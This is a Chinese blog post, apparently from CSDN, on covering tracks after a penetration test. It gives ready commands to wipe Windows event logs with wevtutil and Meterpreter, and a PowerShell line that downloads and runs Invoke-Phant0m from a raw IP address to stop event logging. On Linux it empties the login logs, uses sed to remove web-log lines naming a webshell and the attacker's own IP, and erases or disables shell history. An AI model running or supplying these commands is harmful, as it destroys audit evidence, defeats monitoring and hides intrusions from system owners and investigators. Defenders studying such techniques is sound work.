痕迹清除

最新推荐文章于 2024-05-30 22:40:37 发布
最新推荐文章于 2024-05-30 22:40:37 发布
阅读量626 收藏 4
点赞数
分类专栏: 初学者常见问题 文章标签: linux windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43873557/article/details/113784418
版权

在渗透测试过程中,Windows日志往往会记录系统上的敏感操作,如添加用户,远程登录,执行命令等。攻击者通常会对Windows日志进行清除和绕过。

windows痕迹清除
如何查看:

  • 事件查看器 -> windows日志
  • win+r eventvwr.msc
    保存路径:
    C:\Windows\System32\winevt\Logs\

包括五个类别:应用程序、安全、Setup、系统、转发事件在这里插入图片描述
powershell -c “Get-WinEvent -FilterHashtable @{logname=‘Application’;}”

➢ 系统日志:System
记录操作系统组件产生的事件,主要包括驱动程序、系统组件和应用软件的崩溃以及数据丢失错误等。
➢ 应用程序日志:Application
包含由应用程序或系统程序记录的事件,主要记录程序运行方面的事件,例如数据库程序可以在应用程序日志
中记录文件错误,程序开发人员可以自行决定监视哪些事件。
➢ 安全日志:Security
记录系统的安全审计事件,包含各种类型的登录日志、对象访问日志、进程追踪日志、特权使用、帐号管理、
策略变更、系统事件。安全日志也是调查取证中最常用到的日志。

wevtutil.exe:用于检索有关事件日志和发布者的信息,安装
和卸载事件清单,运行查询以及导出、存档和清除日志。
wevtutil cl security
wevtutil cl system
wevtutil cl application
wevtutil cl “windows powershell”在这里插入图片描述

meterpreter清理日志
• 删除所有在渗透过程中使用的工具
• 删除之前添加的账号:net user username /del
• 删除应用程序、系统和安全日志:clearev #分别清除了应用程序,系统和安全模块的日志记录。
• 关闭所有的Meterpreter连接:sessions –K
在这里插入图片描述
• 查看事件日志:run event_manager -i
• 删除事件日志:run event_manager -c在这里插入图片描述
在这里插入图片描述
利用脚本让日志功能失效,无法记录日志。
powershell “IEX(new-object system.net.webclient).downloadstring(‘http://47.101.214.85:8000/Invoke-
Phant0m.ps1’);Invoke-Phant0m”在这里插入图片描述
把eventlog对应的svchost进程结束,重新开启Windows Event Log服务,即可恢复日志记录在这里插入图片描述
在这里插入图片描述

Linux痕迹清除
ssh远程登录会产生登录日志
命令 日志文件 描述
last /var/log/wtmp 所有成功登录/登出的历史记录
lastb /var/log/btmp 登录失败尝试记录
lastlog /var/log/lastlog 最近登录记录
w,who /var/run/utmp 记录当前登录的每个用户的信息,它只保留当时连接的用户记录,不会为用户
保留永久的记录
命令的输出包括:登录名,上次登录时间,IP地址,端口等。

last等日志是二进制文件,无法直接修改。所以清除的最简单方式是清空日志文件本身。
清空lastb对应的/var/log/btmp文件需要root权限

/var/log/wtmp
/var/log/btmp
/var/log/lastlog
/var/log/httpd/access.log
/var/log/nginx/access.log

在这里插入图片描述
web日志清理
cat /var/log/nginx/access.log | grep -v shell.php > /tmp/a.log
cat /tmp/a.log > /var/log/nginx/access.log
sed -i -e ‘/shell.php/d’ /var/log/httpd/access.log
sed -i -e ‘/123.123.123.123/d’ /var/log/httpd/access.log
第一条删除所有包含shell.php这个字符串的行
第二条删除包含123.123.123.123这个字符串(我们自己的IP)的行.

/var/log/cron:记录了系统定时任务相关的日志在这里插入图片描述
/var/log/secure:记录验证和授权方面的信息,只要涉及账号和密码的程序都会记录,比如SSH登录,su切换用户,sudo授权,甚至添加用户和修改用户密码都会记录在这个日志文件中。
在这里插入图片描述
history:显示历史记录
~/.bash_history:历史记录文件
删除全部历史记录:history –w && history –c && > .bash_history
删除指定行的历史记录:history -d 111
备份还原历史记录:cp .bash_history his.txt
删除100行以后的历史记录:sed -i “100,$d” .bash_history

开启无痕模式,禁用命令历史记录功能。
set +o history
恢复
set -o history

低头观自在
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
关于:删除不需要的事件日志列表
老陈醋的博客
02-15 265
关于:删除不需要的事件日志列表
上网痕迹清除
01-30
百分百完美清除 上网痕迹。备查 妥妥滴。这么说吧,以前俺们老查老查外网机使用痕迹,干脆自己做了个软件。
渗透测试之痕迹清除
qq_29864185的博客
07-01 3350
痕迹清除 当我们达到了目的之后,有时候只是为了黑入网站挂黑页,炫耀一下;或者在网站留下一个后门,作为肉鸡,没事的时候上去溜达溜达;亦或者挂入挖矿木马;但是大家千万不要干这些事,这些都是违法的! 我这里只是教大家在渗透进去之后如何清除我们留下的一部分痕迹,并不能完全清除,完全清除入侵痕迹是不可能的!主要是增加管理员发现入侵者的时间成本和人力成本。只要管理员想查,无论你怎么清除,还是能查到的。 最主要还是要以隐藏自身身份为主,最好的手段是在渗透前挂上代理,然后在渗透后痕迹清除Windows系统
渗透测试入门10之痕迹清理
鹿鸣天涯
04-03 2122
渗透测试入门10之痕迹清理 Windows日志清除 获取日志分类列表: wevtutil el >1.txt 获取单个日志类别的统计信息: eg. wevtutil gli "windows powershell" 回显: creationTime: 2016-11-28T06:01:37.986Z lastAccessTime: 2016-11-28T06:01:37.98...
windows11如何删除映射网络驱动器的历史记录
最新发布
shikaiaixuexi的博客
05-30 288
最近在用docker做一些工作,通过映射网络驱动器可以在windows环境下查看docker文件夹,但是因为虚拟机ip地址总变,会导致对应的网络驱动器失效,手动断开连接并删除后,仍会留下历史记录,很烦。下面提供一个方法,打开win+r打开并输入。选定对应的ip地址的右键删除即可。并回车,打开注册表编辑器。再打开看就没有历史纪录了。
Windows日志清除的一些总结
0ffs3t
11-22 3941
这几日研究的课题是系统日志的清理,主要参考的书籍是《暗战强人. 黑客攻防实战高级演练》,虽然讲到的技术比较老,但对于刚入门 的我还是收获较大。 在Windows系统中,日志文件通常有应用程序日志、安全日志、系统日志、DNS服务器日志、FTP日志、WWW日志等,其扩展名为.log、 .txt。我们先来熟悉下各个日志文件存放的位置及相应的服务。 系统
linux后渗透痕迹清除
The current road is different, love needs to distinguish between right and wrong
11-20 3860
历史记录清除 Bash、shell、终端将当前会话中使用的命令列表保存在内存中,因此必须对其进行清理。 history用于命令查看当前历史记录。 环境变量:HISTFILE 查找history命令文件存储路径: echo $HISTFILE #返回当前用户history命令存储文件路径 删除变量: unset HISTFILE 这时候在使用一次"echo HISTFILE"将返回为空。 为了防止历史命令被保存,也可以将其发送到/dev/null HISTFILE=...
卡巴斯基注册痕迹清除工具.zip
03-23
标题中的“卡巴斯基注册痕迹清除工具.zip”指的是卡巴斯基公司推出的一款专门用于清理计算机中注册表和系统中留存的卡巴斯基安全软件使用记录的工具。卡巴斯基是全球知名的网络安全解决方案提供商,其产品在保护用户...
usb痕迹清除
11-17
如果不想用软件也可以去看我的博客http://blog.csdn.net/xiaxuesong666/article/details/78565363
U盘痕迹清除工具.7z
01-05
标题中的“U盘痕迹清除工具.7z”表明这是一个压缩包文件,包含了用于清除USB设备使用痕迹的软件。这类工具的主要功能是确保用户在使用U盘、移动硬盘、MP3播放器、SD卡等移动存储设备后,不会留下任何可能泄露隐私或...
注册痕迹清除工具 卡巴斯基注册痕迹清除工具 v1.0
10-27
总之,卡巴斯基注册痕迹清除工具是一款实用的工具,对于注重隐私和系统性能的卡巴斯基用户来说,它提供了一个方便的方式来管理和保护自己的数字足迹。正确使用该工具,可以在享受卡巴斯基强大的安全防护同时,进一步...
简单清除windows事件日志
cackeme的专栏
08-03 2048
/** * @param[in] pszSrcName example {"application","system","security"} */ BOOL MyClearEventLog(LPTSTR pszSrcName) {     HANDLE hEventLog;     BOOL bRet;     hEventLog = OpenEventLog(NULL, ps
【每天学习一点新知识】Windows日志分析
RexHa的博客
03-24 7534
日志日志文件为服务器、工作站、防火墙和应用软件等IT资源相关活动记录必要的、有价值的信息。日志文件中的记录可以提供以下用途:监控系统资源;审计用户行为;对可疑行为进行告警;确定入侵行为的范围;为恢复系统提供帮助;生成调查报告;为打击计算机犯罪提供证据来源。主要目的:对攻击行为进行溯源定位攻击者的ip摸清攻击行为,对系统中的安全薄弱点进行加固针对性的进行漏洞加固。
linux以前挂载过的硬盘如何删除挂载记录?
勤劳的执着的运维农民工
10-09 2091
请按照以下方式处理。 1、ssh或者telnet登陆 2、vim /etc/fstab找到对应无法删除的磁盘uuid,按i进入编辑模式,然后移动光标到对应的行,连按两次d(dd),删除对于行。 3、按esc键,退出编辑模式。然后输入:wq!保存配置并退出 4、输入reboot重启系统 此办法适用于曾经挂在过硬盘但是硬盘已经不再使用,或者挂载过的路径现在无法挂载新硬盘,可以用以上办法解决。 ...
windows驱动日志
feixi7358的博客
12-13 3092
如何在windows驱动中的READ及WRITE(代码中没有贴出) 中写日志,以下代码是可以直接运行的,在win7_32位上运行没问题 希望对大家有用 https://blog.csdn.net/feixi7358/article/details/84984154?tdsourcetag=s_pcqq_aiomsg stdafx.h #ifndef _WIN32_WINNT // Al...
pygame 清除痕迹
03-25
若要清除 pygame 渲染窗口中的痕迹,可以使用 `pygame.display.flip()` 函数,它会在屏幕上显示所有绘制的图形,然后清除缓存并刷新窗口。 下面是使用 `pygame.display.flip()` 函数来清除痕迹的示例代码: ```...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值